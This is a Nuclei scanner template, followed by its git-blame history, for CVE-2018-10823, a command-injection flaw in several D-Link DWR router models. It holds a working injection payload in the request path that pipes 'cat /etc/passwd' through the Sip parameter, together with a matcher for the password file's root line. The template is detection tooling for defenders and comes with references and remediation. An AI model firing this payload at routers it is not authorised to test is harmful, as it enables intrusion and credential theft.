nuclei-templates/http/cves/2018/CVE-2018-10823.yaml

id: CVE-2018-10823

info:
  name: D-Link Routers - Remote Command Injection
  author: wisnupramoedya
  severity: high
  description: |
    D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected router.
  remediation: |
    Apply the latest firmware update provided by D-Link to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/45676
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10823
    - https://seclists.org/fulldisclosure/2018/Oct/36
    - http://sploit.tech/2018/10/12/D-Link.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-10823
    cwe-id: CWE-78
    epss-score: 0.96759
    epss-percentile: 0.9967
    cpe: cpe:2.3:o:dlink:dwr-116_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dwr-116_firmware
  tags: cve,cve2018,rce,iot,dlink,router,edb,seclists

http:
  - method: GET
    path:
      - "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202dd28b31608a43a3c4493267bee160bb0604051c8b413fceb611ee5bf2f78a560221009055db2ddb25f781a71fc23746b17aca5f10baf45be8f347f20ef73c917bfbca:922c64590222798bb761d5b6d8e72950
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00			`id: CVE-2018-10823`

			`info:`
Enhancement: cves/2018/CVE-2018-10823.yaml by mp 2022-06-19 15:45:43 +00:00			`name: D-Link Routers - Remote Command Injection`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00			`author: wisnupramoedya`
			`severity: high`
Update CVE-2018-10823.yaml 2022-06-20 15:50:55 +00:00			`description: \|`
Auto Generated CVE annotations [Mon Jun 20 17:58:28 UTC 2022] :robot: 2022-06-20 17:58:28 +00:00			`D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected router.`
updated 2018 CVEs 2023-09-06 12:57:14 +00:00			`remediation: \|`
			`Apply the latest firmware update provided by D-Link to mitigate this vulnerability.`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/45676`
			`- https://nvd.nist.gov/vuln/detail/CVE-2018-10823`
Auto Generated CVE annotations [Mon Jun 20 17:58:28 UTC 2022] :robot: 2022-06-20 17:58:28 +00:00			`- https://seclists.org/fulldisclosure/2018/Oct/36`
			`- http://sploit.tech/2018/10/12/D-Link.html`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/ARPSyndicate/kenzer-templates`
Auto Generated CVE annotations [Mon Oct 18 15:19:41 UTC 2021] :robot: 2021-10-18 15:19:41 +00:00			`classification:`
TemplateMan Update [Thu Nov 9 06:04:51 UTC 2023] :robot: 2023-11-09 06:04:52 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 8.8`
Auto Generated CVE annotations [Mon Oct 18 15:19:41 UTC 2021] :robot: 2021-10-18 15:19:41 +00:00			`cve-id: CVE-2018-10823`
			`cwe-id: CWE-78`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.96759`
			`epss-percentile: 0.9967`
updated 2018 CVEs 2023-09-06 12:57:14 +00:00			`cpe: cpe:2.3:o:dlink:dwr-116_firmware::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: dlink`
			`product: dwr-116_firmware`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve,cve2018,rce,iot,dlink,router,edb,seclists`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "root:.*:0:0:"`
Create CVE-2018-10823.yaml 2021-10-18 12:56:22 +00:00
			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a0047304502202dd28b31608a43a3c4493267bee160bb0604051c8b413fceb611ee5bf2f78a560221009055db2ddb25f781a71fc23746b17aca5f10baf45be8f347f20ef73c917bfbca:922c64590222798bb761d5b6d8e72950`